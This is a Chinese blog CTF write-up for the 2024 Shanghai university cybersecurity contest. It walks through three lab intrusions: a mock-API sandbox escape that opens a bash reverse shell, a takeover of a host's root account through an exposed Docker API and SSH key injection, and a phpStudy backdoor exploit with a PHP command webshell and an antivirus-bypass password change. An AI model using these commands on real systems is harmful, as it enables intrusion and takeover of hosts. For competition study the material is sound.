第九届上海市大学生网络安全大赛暨“磐石行动”2024第二届全国高校网络安全攻防活动 复赛(漏洞挖掘赛) Writeup

最新推荐文章于 2024-07-17 13:49:51 发布
最新推荐文章于 2024-07-17 13:49:51 发布
阅读量888 收藏 14
点赞数 26
分类专栏: Writeup CTF相关 文章标签: web安全 安全 网络安全 php docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHTXRT/article/details/139224421
版权

虽然打得很菜(),但是第一次遇到这种赛制,还是记录一下。

战队信息

战队名称:Besti学研组

战队排名:31

个人排名:24

快乐行程

参考资料:https://developer.aliyun.com/article/1338885

nmap 扫描端口,发现开放22(ssh)和3000,其中3000可以通过HTTP访问。

打开3000端口的网页,注册一个账号,信息随便填,注册后进入后台,创建一个接口,选择高级Mock,添加一下代码命令并进行保存,再次点击预览访问Mock地址可查看执行结果。
在这里插入图片描述

反弹shell代码如下:

const sandbox = this  
const ObjectConstructor = this.constructor  
const FunctionConstructor = ObjectConstructor.constructor  
const myfun = FunctionConstructor('return process')  
const process = myfun()  
mockJson = process.mainModule.require("child_process").execSync("bash -c 'bash -i  >&/dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1'").toString()

获取到shell后,直接输入命令 sudo cat /root/flag 即可得到 flag。

参考资料:Docker暴露2375端口导致服务器被攻击解决方法!_docker怎么关闭2375端口-CSDN博客

ifconfig 获取主机A的“内网”接口地址,使用nmap命令 sudo nmap -sP 192.168.xxx.xxx/xx 扫描网段内的主机,找到主机B(192.168.99.77)后,使用 sudo nmap -sS 192.168.99.77 进行端口扫描,发现主机B开放了2375端口(Docker),2375是docker远程操控的默认端口,通过这个端口可以直接对远程的docker daemon进行操作。

使用 docker -H tcp://192.168.99.77:2375 ps 命令,发现可以操作且没有ssl验证。于是直接输入命令启动一个镜像:

docker -H tcp://192.168.99.77:2375 pull ubuntu
docker -H tcp://192.168.99.77:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

然后进行ssh pub key注入,生成一对新的pub key:

ssh-keygen -t rsa -C "hello@world.com"
save_path:/tmp/id_rsa

在容器中执行:

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.....(公钥)
>EOF

然后可以登录宿主机:

ssh -i /tmp/id_rsa root@192.168.99.77

登录后直接 cat flag即可

温故而知新

nmap 扫描端口,发现开放3306(mysql)、3389(远程桌面连接)、7680、8080(HTTP),其中3306无法直接用mysql远程连接,7680不知道干什么的,直接访问8080,显示helloworld,扫描目录只能扫到一个 config.inc.php

根据Web特征值进行搜索,发现漏洞:【漏洞复现】phpstudy隐藏后门漏洞的验证与利用_phpstudy写webshell报错-CSDN博客
在这里插入图片描述

构造如下HTTP请求:

GET /config.inc.php HTTP/1.1
Host: 10.119.211.106:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding:gzip,deflate
Accept-Charset:cGhwaW5mbygpOw==
Accept-Language: zh-CN,zh;q=0.9
Connection: close

即可执行Accept-Charset中Base64解码后的php代码,如图:
在这里插入图片描述

接下来就比较简单了,尽管所有命令执行函数都被ban,但是文件操作函数不受影响,于是使用print_r(scandir("C://Users/"));查看目录,发现idss用户,接着直接 print_r(file_get_contents("C://Users/idss/Desktop/flag"));得到flag。

也可以使用

$command = $_GET['cmd'];$wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c".$command); $stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;$stdout = $exec->StdErr();$stroutput = $stdout->ReadAll();echo $stroutput;

进行系统命令执行。接下来利用dir读取目录,type读取文件,也能读取flag。

更进一步,net user idss 111111111 修改密码会被火绒屏蔽,于是使用命令:

copy C:\Windows\System32\net1.exe C:\phpStudy\PHPTutorial\WWW\
C:\phpStudy\PHPTutorial\WWW\net1.exe user idss 111111111

即可成功修改idss用户的密码,接下来就可以使用Windows远程桌面进行连接。

CHTXRT
关注
  • 26
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第九届上海市大学生网络安全大赛磐石行动2024第二届全国高校网络安全攻防活动 MISC wifi密码
05-29
第九届上海市大学生网络安全大赛磐石行动2024第二届全国高校网络安全攻防活动 MISC wifi密码题目
上海市大学生网络安全-磐石行动复赛wp
zwy3327078581的博客
05-28 634
上海市大学生网络安全-磐石行动复赛wp
2023上海“磐石行动”pwn wp
m0_63437215的博客
05-23 494
2023上海市大学生网络安全大赛 pwn
第九届上海市大学生网络安全大赛磐石行动2024第二届全国高校网络安全攻防活动 网络安全道 个人Writeup(Re方向)
CHTXRT的博客
05-27 728
战队名称:Besti学研组战队排名:18个人排名:33。
第九届上海市大学生网络安全大赛网络安全道(Web方向)
Zue3r的博客
05-27 716
第九届上海市大学生网络安全大赛网络安全道(Web方向)
2023年磐石行动第十周
weixin_44394805的博客
06-26 472
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5V7vOD8R-1687765887923)(一周一练wp/image-20230619095306076.png)]那么通过爆破X在(1,e+1)区间内,计算出p值,然后通过p计算出x,如果计算出c1相等。通过梳理程序逻辑发现先异或0xa然后大小写字母右移动3,然后通过caesar。然后得到p,但是这个题目中没有n和q,那么无法计算出q,这个题目泄露了dp那么可以通过dp计算出p值,通过工具查壳发现是upx壳,然后直接通过。
2024磐石行动第一周(1),费时6个月成功入职阿里
2401_83627805的博客
04-14 544
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!然后这个时候把用户的密码修改,就可以将任意账号的密码修改,这里存在一个逻辑漏洞,可以任意用户密码。然后发现直接使用188手机号无法获取到验证码,但是自己的手机号可以获取到验证码,开始查了芝麻乐CMS,发现并没有公开的漏洞,然后开始研究网站的功能。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。
安全之基 坚如磐石.docx
10-01
安全之基 坚如磐石】 在我们的日常工作中,安全始终是不可忽视的基石。这个主题“安全之基 坚如磐石”强调了安全在任何行业,尤其是技术安全领域的重要性。正如演讲中提到的,安全关乎每一个家庭的幸福,是父母对...
WEB应用防火墙」BSIMM——构筑坚若磐石安全软件 - 无线安全.zip
11-30
WEB应用防火墙」BSIMM——构筑坚若磐石安全软件 - 无线安全 数据安全 安全实践 安全体系 Android 安全管理
BSIMM——构筑坚若磐石安全软件.pdf
08-07
Agenda •软件安全的现状 •BSIMM (Build Security In Maturity Model)起源 •BSIMM 的执行与落地 •基于BSIMM的SDLC全生命周期软件安全管控
吉林省磐石市2013届九年级英语上学期期末教学检测试题(无答案) 人教新目标版
08-07
第二部分则需要学生根据听到的问题选择正确答案,可能涵盖生活场景、时间安排、活动内容等方面的理解。 基础知识部分分为词汇分类、句意填词和单项选择。词汇分类旨在检查学生对词汇类别和词义的理解,例如,找出与...
第九届上海市大学生网络安全大赛-磐石行动网络攻防
CLAY0011的博客
05-26 320
这是一个破解wifi密码的流量分析题。这是一个破解wifi密码的流量分析题。
第九届上海市大学生网络安全大赛磐石行动2024第二届全国高校网络安全攻防活动 数据安全道 个人Writeup
CHTXRT的博客
05-27 448
战队名称:Besti学研组战队排名:17个人排名:10。
2023年磐石行动第七周
weixin_44394805的博客
06-26 746
程序需要传入str1和str2字符串,然后字符串经过异或后成为str,然后通过waf和长度30限制后就可以执行eval函数,通过测试发现waf过滤了大量的函数,然后可以输入字母等其他字符(不是无字符webshell),然后可以通过和特定字符。然后再图片尾部发现zip压缩包,然后发现有密码,然后尝试伪加密、字典、爆破都不行,最后才这个可能就是密码,然后试了发现这个就是密码,得到flag.txt。,然后经过提示发现可以通过通过两次异或,类似于无字符webshell那样传入异或的字符串绕过system过滤。
2024年中国杭州|网络安全技能大赛(CTF)正式开启竞报名
weixin_57514792的博客
01-09 3852
CTF
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
jammny
01-21 4066
前言 Vulhub是一个基于dockerdocker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 Voulhub靶机平台环境搭建和使用: https://blog.csdn.net/qq_41832837/article/details/103948358 目录: 漏洞原理 漏洞详情 漏洞复现 ...
漏洞挖掘与防范(进阶篇)
chaojixiaojingang
08-13 5625
今天学习的漏洞挖掘与防范比较好学,而且对于一些使用的存在漏洞的函数实现也是比较顺利,所以博客的进度也加快了,现在我就把学到的东西和大家分享一下。 1.代码执行漏洞 代码执行漏洞是指应用程序本身过滤不严,用户可以通过请求将代码注入到应用中执行。这样的漏洞如果没有特殊的过滤,相当于直接有一个web后门的存在,该漏洞主要由eval()、assert()、preg_replace()、call_use...
提升无线网络安全:用Python脚本发现并修复WiFi安全问题
最新发布
m0_68483928的博客
07-17 518
文章详细介绍了如何使用Python脚本和一些强大的开源工具来捕获和测试WPA/WPA2握手。通过上述步骤,您可以在本地测试WiFi密码的安全性,并了解其潜在的漏洞。最后,选择指定密码本进行爆破(我这里的是从网络上收集的,大家可以自行去收集,或者评论或私信我获取)在本文中,我们将介绍并展示如何使用Python脚本来破解WiFi密码。首先,它会验证路由器的MAC地址(BSSID)是否格式正确,例如00:77:88:33:44:55。工具,通过提供的单词表文件来获取密码。·命令查看路由器的网卡地址,并输入。
海康威视磐石系列cvr操作手册
06-23
### 回答1: 海康威视磐石系列CVR是一款高性能的网络视频录像机,支持多种功能和应用。操作手册是CVR用户必备的工具,可以帮助用户了解产品的功能和使用方法,提高使用效率。本文将简要介绍海康威视磐石系列CVR操作手册的主要内容。 1. CBR产品介绍:该部分主要介绍海康威视磐石系列CVR的参数配置、硬件结构、主要功能等内容,帮助用户了解产品特点。 2. 安装与配置:该部分主要介绍CVR的安装和配置流程,包括设备联网、录像配置、用户管理等内容,帮助用户快速完成设备的安装和网络配置。 3. 实时预览与回放:该部分介绍CVR的预览和回放功能,包括如何实现多通道视频预览和回放、如何进行远程预览等内容。 4. 报警与事件管理:该部分介绍CVR的报警事件管理,包括如何设置报警、如何查询事件记录等内容。 5. 存储与备份:该部分介绍CVR的存储和备份功能,包括如何设置录像存储、如何进行录像备份等内容。 6. 系统管理:该部分介绍CVR的系统管理功能,包括如何进行系统升级、如何设置设备时间等内容。 总之,海康威视磐石系列CVR操作手册是使用该产品的必备工具,帮助用户了解和掌握设备的相关操作和使用方法,提高使用效率,更好地保障人民生命财产安全。 ### 回答2: 海康威视磐石系列CVR操作手册提供了详细的操作指南,帮助用户更好的使用设备。手册包括了设备的基础配置和使用方法,包括设备的安装、网络配置、用户管理、存储管理等方面的详细说明。同时还包含了设备的常规维护和故障排除方案,帮助用户更好地管理设备。 在设备安装阶段,手册详细介绍了设备的物理环境要求,包括设备的摆放要求、供电要求等;网络配置阶段则介绍了设备的网络连接方式、IP地址配置等;用户管理方面则介绍了如何设置用户的权限和密码等;存储管理方面则介绍了如何设置设备的录像方式和存储容量。 此外,手册还详细介绍了CVR的常规维护方法和故障排除方案。如定期进行设备清洁、合理利用存储空间、备份重要数据等常规维护措施;同时也介绍了设备常见问题的排查方法,如设备无响应、录像失效等故障情况的解决方案。 总体来说,海康威视磐石系列CVR操作手册是一份详实、易懂的操作指南,为用户提供了便利和支持。在使用设备时,用户可以根据手册,轻松完成设备的操作和维护。 ### 回答3: 海康威视磐石系列的CVR操作手册详细介绍了该系列录像机的各项功能及操作方法。该手册适用于磐石系列中的所有型号,包括了硬盘管理、录像回放、网络设置、事件查询等方面的详细说明,方便用户快速上手。 首先,该手册详细介绍了磐石系列CVR的硬盘管理。用户可以根据硬盘容量及优先级设置定期或循环覆盖录像内容,也可手动删除无效录像以节约硬盘空间。此外,手册还介绍了支持SATA硬盘的插拔方式及硬盘的格式化方法。 其次,手册详细介绍了磐石系列CVR的录像回放功能。用户可根据时间轴、录像类型及通道选择进行回放,并支持快进、慢放、单帧播放等多种操作。还可进行分段回放、抓图、下载等。 此外,手册还介绍了网络设置方面的内容。用户可以设置网络参数,通过网络远程访问录像机,也可通过PPPoE、DHCP等方式连接网络。手册还包括了远程控制、设备管理等相关内容。 最后,手册还介绍了事件查询功能。用户可以查询设备及通道的报警事件、操作记录、日志等,并支持按照时间、类型、用户名等多种条件筛选查找。 总之,海康威视磐石系列CVR操作手册详尽地介绍了该系列录像机的功能和操作方法,有助于用户快速上手,并能更好地利用录像机的各项功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值